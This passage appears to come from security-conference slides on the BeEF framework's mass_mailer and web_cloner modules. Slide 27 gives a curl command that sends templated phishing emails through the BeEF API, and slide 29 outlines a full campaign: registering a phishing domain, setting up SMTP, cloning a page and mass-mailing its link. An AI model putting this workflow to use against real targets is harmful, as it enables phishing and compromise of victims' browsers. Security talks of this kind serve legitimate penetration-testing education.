  • 25. BeEF mass_mailer • ‘default’ template HTML mail 25
  • 26. BeEF mass_mailer • how the ‘default’ template email will look 26
  • 27. BeEF mass_mailer • curl -H "Content-Type: application/json; charset=UTF-8" -d 'body' -X POST http://<BeEF>/api/ seng/send_mails?token=0fda00ea62a1102f { "template": "default", "subject": "Hi from BeEF", "fromname": "BeEF", "link": "http://www.microsoft.com/", "linktext": "http://beefproject.com", "recipients": [{ "user1@gmail.com": "Michele", "user2@antisnatchor.com": "Antisnatchor" }]} 27
  • 28. BeEF mass_mailer • Demo 28
  • 29. Combine everything FTW • Register your phishing domain • Point the A/MX records to a VPS where you have an SMTP server and BeEF • Create a BeEF RESTful API script that: • Clone a webpage link with web_cloner • Send X emails with that link with mass_mailer • Script intelligent attacks thanks to BeEF browser detection 29
  • 30. Combine everything FTW • Last demo 30
  • 31. BeEF web_cloner + mass_mailer + RESTful API = 31
  • 32. Thanks • Wade to be always awesome • The other BeEF guys: Brendan, Christian, Ben, Saafan, Ryan, Heather • A few new project joiners: Bart Leppens, gallypette, Quentin Swain • Tom Neaves for the butcher/hook images :D 32